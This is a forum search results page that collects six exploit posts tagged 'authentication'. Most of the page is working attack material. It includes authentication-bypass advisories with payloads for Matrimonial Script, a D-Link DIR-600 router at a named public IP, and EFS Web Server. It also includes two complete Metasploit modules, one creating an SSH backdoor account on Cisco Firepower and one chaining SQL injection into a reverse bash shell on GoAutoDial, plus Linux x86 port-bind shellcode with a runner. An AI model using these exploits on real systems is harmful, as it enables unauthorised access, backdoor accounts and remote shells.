
Search the forums

Showing results for the tag 'authentication'.




Categories

  • Articles

6 results found

  1. Hacking

    ####################################################
    <!--
    # Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: N/A
    # Date: 27.08.2017
    # Vendor Homepage: http://www.scubez.net/
    # Software Link: http://www.mscript.in/
    # Version: 2.7
    # Category: Webapps
    # Tested on: Windows 7 / Mozilla Firefox
    # Supporting tools for testing: No-Redirect Add-on in Firefox
    # --!>
    # ========================================================
    #
    # Admin panel Authentication bypass
    #
    # Description: Attackers are able to completely compromise the web application built upon
    # Matrimonial Script, as they can gain access to the admin panel and manage the website as an admin without
    # prior authentication!
    #
    # Proof of Concept:
    # Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
    # Step 2: Access http://example.com/path/admin/index.php
    #
    # Risk: Unauthenticated attackers are able to gain full access to the administrator panel
    # and thus have total control over the web application, including content change, adding an admin user, etc.
    #
    # ========================================================
    # [+] Disclaimer
    #
    # Permission is hereby granted for the redistribution of this advisory,
    # provided that it is not altered except by reformatting it, and that due
    # credit is given. Permission is explicitly given for insertion in
    # vulnerability databases and similar, provided that due credit is given to
    # the author. The author is not responsible for any misuse of the information contained
    # herein and prohibits any malicious use of all security related information
    # or exploits by the author or elsewhere.
    ####################################################
  2. Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
    # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
    # Date: 29-08-2017
    # Exploit Author: Jithin D Kurup
    # Contact: https://in.linkedin.com/in/jithin-d-kurup-77b616142
    # Vendor: www.dlink.com
    # Version: Hardware version: B1, Firmware version: 2.01
    # Tested on: All Platforms

    1) Description

    After successfully connecting to a D-Link DIR-600 router (firmware version 2.01), any user can easily bypass the router's admin panel just by adding a simple payload to the URL.

    D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.

    It is more dangerous when your router has a public IP with remote login enabled.

    In my case, the tested router IP was: http://190.164.170.249

    Video POC: https://www.youtube.com/watch?v=PeNOJORAQsQ

    2) Proof of Concept

    Step 1: Go to the router login page: http://190.164.170.249:8080
    Step 2: Add the payload to the URL.

    Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd

    Bingooo, you got admin access on the router. Now you can download/upload settings, change settings, etc.

    ---------------Greetz----------------
    +++++++++++ www.0seccon.com ++++++++++++
    Saran, Dhani, Gem, Vignesh, Hemanth, Sudin, Vijith
  3.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Exploit::Remote::SSH

      def initialize(info={})
        super(update_info(info,
          'Name'           => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
          'Description'    => %q{
            This module exploits a vulnerability found in Cisco Firepower Management Console.
            The management system contains a configuration flaw that allows the www user to
            execute the useradd binary, which can be abused to create backdoor accounts.
            Authentication is required to exploit this vulnerability.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Matt',   # Original discovery & PoC
              'sinn3r'  # Metasploit module
            ],
          'References'     =>
            [
              [ 'CVE', '2016-6433' ],
              [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
            ],
          'Platform'       => 'linux',
          'Arch'           => ARCH_X86,
          'Targets'        =>
            [
              [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => 'Oct 10 2016',
          'CmdStagerFlavor'=> %w{ echo },
          'DefaultOptions' =>
            {
              'SSL'        => 'true',
              'SSLVersion' => 'Auto',
              'RPORT'      => 443
            },
          'DefaultTarget'  => 0))

        register_options(
          [
            # admin:Admin123 is the default credential for 6.0.1
            OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
            OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
            OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
            OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
            OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
            OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
          ], self.class)
      end

      def check
        # For this exploit to work, we need to check two services:
        # * HTTP - To create the backdoor account for SSH
        # * SSH  - To execute our payload

        vprint_status('Checking Cisco Firepower Management console...')
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
        })

        if res && res.code == 200
          vprint_status("Console is found.")
          vprint_status("Checking SSH service.")
          begin
            ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
              Net::SSH.start(rhost, 'admin',
                port:            datastore['SSHPORT'],
                password:        Rex::Text.rand_text_alpha(5),
                auth_methods:    ['password'],
                non_interactive: true
              )
            end
          rescue Timeout::Error
            vprint_error('The SSH connection timed out.')
            return Exploit::CheckCode::Unknown
          rescue Net::SSH::AuthenticationFailed
            # Hey, it talked. So that means SSH is running.
            return Exploit::CheckCode::Appears
          rescue Net::SSH::Exception => e
            vprint_error(e.message)
          end
        end

        Exploit::CheckCode::Safe
      end

      def get_sf_action_id(sid)
        requirements = {}

        print_status('Attempting to obtain sf_action_id from rulesimport.cgi')

        uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => uri,
          'cookie' => "CGISESSID=#{sid}"
        })

        unless res
          fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
        end

        sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]

        unless sf_action_id
          fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
        end

        sf_action_id
      end

      def create_ssh_backdoor(sid, user, pass)
        uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
        sf_action_id = get_sf_action_id(sid)
        sh_name = 'exploit.sh'

        print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")

        mime_data = Rex::MIME::Message.new
        mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
        mime_data.add_part('file', nil, nil, 'form-data; name="source"')
        mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
        mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
        mime_data.add_part(
          "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
          'application/octet-stream',
          nil,
          "form-data; name=\"file\"; filename=\"#{sh_name}\""
        )

        send_request_cgi({
          'method'   => 'POST',
          'uri'      => uri,
          'cookie'   => "CGISESSID=#{sid}",
          'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
          'data'     => mime_data.to_s,
          'vars_get' => { 'no_mojo' => '1' },
        })
      end

      def generate_new_username
        datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
      end

      def generate_new_password
        datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
      end

      def report_cred(opts)
        service_data = {
          address:      rhost,
          port:         rport,
          service_name: 'cisco',
          protocol:     'tcp',
          workspace_id: myworkspace_id
        }

        credential_data = {
          origin_type:     :service,
          module_fullname: fullname,
          username:        opts[:user],
          private_data:    opts[:password],
          private_type:    :password
        }.merge(service_data)

        login_data = {
          last_attempted_at: DateTime.now,
          core:              create_credential(credential_data),
          status:            Metasploit::Model::Login::Status::SUCCESSFUL,
          proof:             opts[:proof]
        }.merge(service_data)

        create_credential_login(login_data)
      end

      def do_login
        console_user = datastore['USERNAME']
        console_pass = datastore['PASSWORD']
        uri = normalize_uri(target_uri.path, 'login.cgi')

        print_status("Attempting to login in as #{console_user}:#{console_pass}")

        res = send_request_cgi({
          'method'    => 'POST',
          'uri'       => uri,
          'vars_post' => {
            'username' => console_user,
            'password' => console_pass,
            'target'   => ''
          }
        })

        unless res
          fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
        end

        res_cookie = res.get_cookies
        if res.code == 302 && res_cookie.include?('CGISESSID')
          cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
          print_status("CGI Session ID: #{cgi_sid}")
          print_good("Authenticated as #{console_user}:#{console_pass}")
          report_cred(username: console_user, password: console_pass)
          return cgi_sid
        end

        nil
      end

      def execute_command(cmd, opts = {})
        @first_exec = true
        cmd.gsub!(/\/tmp/, '/usr/tmp')

        # Weird hack for the cmd stager.
        # Because it keeps using > to write the payload.
        if @first_exec
          @first_exec = false
        else
          cmd.gsub!(/>>/, ' > ')
        end

        begin
          Timeout.timeout(3) do
            @ssh_socket.exec!("#{cmd}\n")
            vprint_status("Executing #{cmd}")
          end
        rescue Timeout::Error
          fail_with(Failure::Unknown, 'SSH command timed out')
        rescue Net::SSH::ChannelOpenFailed
          print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
          retry
        end
      end

      def init_ssh_session(user, pass)
        print_status("Attempting to log into SSH as #{user}:#{pass}")

        factory = ssh_socket_factory
        opts = {
          auth_methods:    ['password', 'keyboard-interactive'],
          port:            datastore['SSHPORT'],
          use_agent:       false,
          config:          false,
          password:        pass,
          proxy:           factory,
          non_interactive: true
        }

        opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

        begin
          ssh = nil
          ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
            @ssh_socket = Net::SSH.start(rhost, user, opts)
          end
        rescue Net::SSH::Exception => e
          fail_with(Failure::Unknown, e.message)
        end
      end

      def exploit
        # To exploit the useradd vuln, we need to login first.
        sid = do_login
        return unless sid

        # After login, we can call the useradd utility to create a backdoor user
        new_user = generate_new_username
        new_pass = generate_new_password
        create_ssh_backdoor(sid, new_user, new_pass)

        # Log into the SSH backdoor account
        init_ssh_session(new_user, new_pass)

        begin
          execute_cmdstager({:linemax => 500})
        ensure
          @ssh_socket.close
        end
      end
    end
  4. Hacking

    # Exploit Title: EFS Web Server 7.2 Authentication Bypass
    # Date: 11-06-2017
    # Software Link: http://www.sharing-file.com/efssetup.exe
    # Software Version: 7.2
    # Exploit Author: Touhid M.Shaikh
    # Contact: http://twitter.com/touhidshaikh22
    # Website: http://touhidshaikh.com/

    ######## Description ########
    <!--
    What is Easy File Sharing Web Server 7.2?
    Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.
    -->

    ######## Video PoC and Article ########
    https://www.youtube.com/watch?v=XlTH7Fm1m1w
    http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/

    ######## Attack Description ########
    <!--
    Note: No need to login... because this is an auth bypass vulnerability. hehehe.
    ==>START<==
    Any visitor.. We can bypass the login screen by just changing the URL and browsing the drives. bingoo...
    -->

    ######## Proof of Concept ########
    When we visit the EFS web server it prompts for login; now the attacker just changes the URL to the one below.

    Exploit....
    http://192.168.1.14/disk_c/

    In this case, change the drive by just changing /disk_c to /disk_<Drive letter>, for example /disk_d, /disk_f, etc.

    =============================================
    NOTE :: :: Now we have permission to view drives and folders and download files in different drives or folders.
    ============================================
  5.

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info={})
        super(update_info(info,
          'Name'           => "GoAutoDial 3.3 Authentication Bypass / Command Injection",
          'Description'    => %q{
            This module exploits a SQL injection flaw in the login functionality for GoAutoDial
            version 3.3-1406088000 and below, and attempts to perform command injection. This also
            attempts to retrieve the admin user details, including the cleartext password stored
            in the underlying database. Command injection will be performed with root privileges.
            The default pre-packaged ISO builds are available from goautodial.org. Currently, the
            hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the
            handler should be setup to receive it appropriately.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Chris McCurley', # Discovery & Metasploit module
            ],
          'References'     =>
            [
              ['CVE', '2015-2843'],
              ['CVE', '2015-2845']
            ],
          'Platform'       => %w{unix},
          'Arch'           => ARCH_CMD,
          'Targets'        =>
            [
              ['Automatic', {} ]
            ],
          'DefaultOptions' =>
            {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            },
          'DefaultTarget'  => 0,
          'Privileged'     => false,
          'DisclosureDate' => 'Apr 21 2015'))

        register_options(
          [
            OptPort.new('RPORT', [true, 'The target port', 443]),
            OptBool.new('SSL', [false, 'Use SSL', true]),
            OptString.new('TARGETURI', [true, 'The base path', '/'])
          ])
      end

      def check
        res = check_version()
        if res and res.body =~ /1421902800/
          return Exploit::CheckCode::Safe
        else
          return Exploit::CheckCode::Vulnerable
        end
      end

      def check_version()
        uri = target_uri.path
        send_request_cgi({
          'method'  => 'GET',
          'uri'     => normalize_uri(uri, 'changelog.txt'),
          'headers' => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity'
          }
        })
      end

      def sqli_auth_bypass()
        uri = target_uri.path
        send_request_cgi({
          'method'  => 'POST',
          'uri'     => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'),
          'headers' => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity'
          },
          'vars_post' => {
            'user_name' => 'admin',
            'user_pass' => '\'%20or%20\'1\'%3D\'1'
          }
        })
      end

      def sqli_admin_pass(cookies)
        uri = target_uri.path
        send_request_cgi({
          'method'  => 'GET',
          'uri'     => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
          'headers' => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity',
            'Cookie'          => cookies
          }
        })
      end

      #
      # Run the actual exploit
      #
      def execute_command()
        encoded = Rex::Text.encode_base64("#{payload.encoded}")
        params = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
        uri = target_uri.path
        send_request_cgi({
          'method'  => 'GET',
          'uri'     => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
          'headers' => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity',
            'Cookie'          => @cookie
          }
        })
      end

      def exploit()
        print_status("#{rhost}:#{rport} - Trying SQL injection...")
        res1 = sqli_auth_bypass()
        if res1 && res1.code == 200
          print_good('Authentication Bypass (SQLi) was successful')
        else
          print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
        end
        @cookie = res1.get_cookies

        print_status("#{rhost}:#{rport} - Dumping admin password...")
        res = sqli_admin_pass(@cookie)
        if res
          print_good(res.body)
        else
          print_error('Error: No creds returned, possible mitigations are in place.')
        end

        print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
        execute_command()
      end
    end
  6.

    /*
     * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86
     * Copyright (c) 2006 Gotfault Security <[email protected]>
     *
     * portbind shellcode that bind()'s a shell on port 64713/tcp
     * and requests a user password.
     *
     */

    #include <stdio.h>
    #include <string.h>

    char shellcode[] =
        /* socket(AF_INET, SOCK_STREAM, 0) */
        "\x6a\x66"              // push $0x66
        "\x58"                  // pop %eax
        "\x6a\x01"              // push $0x1
        "\x5b"                  // pop %ebx
        "\x99"                  // cltd
        "\x52"                  // push %edx
        "\x53"                  // push %ebx
        "\x6a\x02"              // push $0x2
        "\x89\xe1"              // mov %esp,%ecx
        "\xcd\x80"              // int $0x80
        /* bind(s, server, sizeof(server)) */
        "\x52"                  // push %edx
        "\x66\x68\xfc\xc9"      // pushw $0xc9fc      // PORT = 64713
        "\x66\x6a\x02"          // pushw $0x2
        "\x89\xe1"              // mov %esp,%ecx
        "\x6a\x10"              // push $0x10
        "\x51"                  // push %ecx
        "\x50"                  // push %eax
        "\x89\xe1"              // mov %esp,%ecx
        "\x89\xc6"              // mov %eax,%esi
        "\x43"                  // inc %ebx
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        /* listen(s, anything) */
        "\xb0\x66"              // mov $0x66,%al
        "\xd1\xe3"              // shl %ebx
        "\xcd\x80"              // int $0x80
        /* accept(s, 0, 0) */
        "\x52"                  // push %edx
        "\x52"                  // push %edx
        "\x56"                  // push %esi
        "\x89\xe1"              // mov %esp,%ecx
        "\x43"                  // inc %ebx
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        "\x96"                  // xchg %eax,%esi
        /* send(s, "Password: ", 0x0a, flags) */
        "\x52"                  // push %edx
        "\x68\x72\x64\x3a\x20"  // push $0x203a6472
        "\x68\x73\x73\x77\x6f"  // push $0x6f777373
        "\x66\x68\x50\x61"      // pushw $0x6150
        "\x89\xe7"              // mov %esp,%edi
        "\x6a\x0a"              // push $0xa
        "\x57"                  // push %edi
        "\x56"                  // push %esi
        "\x89\xe1"              // mov %esp,%ecx
        "\xb3\x09"              // mov $0x9,%bl
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        /* recv(s, *buf, 0x08, flags) */
        "\x52"                  // push %edx
        "\x6a\x08"              // push $0x8
        "\x8d\x4c\x24\x08"      // lea 0x8(%esp),%ecx
        "\x51"                  // push %ecx
        "\x56"                  // push %esi
        "\x89\xe1"              // mov %esp,%ecx
        "\xb3\x0a"              // mov $0xa,%bl
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        "\x87\xf3"              // xchg %esi,%ebx
        /* like: strncmp(string1, string2, 0x8) */
        "\x52"                  // push %edx
        "\x68\x61\x75\x6c\x74"  // push $0x746c7561  // password
        "\x68\x67\x6f\x74\x66"  // push $0x66746f67  // here
        "\x89\xe7"              // mov %esp,%edi
        "\x8d\x74\x24\x1c"      // lea 0x1c(%esp),%esi
        "\x89\xd1"              // mov %edx,%ecx
        "\x80\xc1\x08"          // add $0x8,%cl
        "\xfc"                  // cld
        "\xf3\xa6"              // repz cmpsb %es:(%edi),%ds:(%esi)
        "\x74\x04"              // je dup
        /* exit(something) */
        "\xf7\xf0"              // div %eax
        "\xcd\x80"              // int $0x80
        /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
        "\x6a\x02"              // push $0x2
        "\x59"                  // pop %ecx
        "\xb0\x3f"              // mov $0x3f,%al
        "\xcd\x80"              // int $0x80
        "\x49"                  // dec %ecx
        "\x79\xf9"              // jns dup_loop
        /* execve("/bin/sh", ["/bin/sh"], NULL) */
        "\x6a\x0b"              // push $0xb
        "\x58"                  // pop %eax
        "\x52"                  // push %edx
        "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
        "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
        "\x89\xe3"              // mov %esp,%ebx
        "\x52"                  // push %edx
        "\x53"                  // push %ebx
        "\x89\xe1"              // mov %esp,%ecx
        "\xcd\x80";             // int $0x80

    int main()
    {
        /* Cast the byte string to a function pointer and jump into it. */
        int (*f)() = (int(*)())shellcode;
        printf("Length: %zu\n", strlen(shellcode));
        f();
    }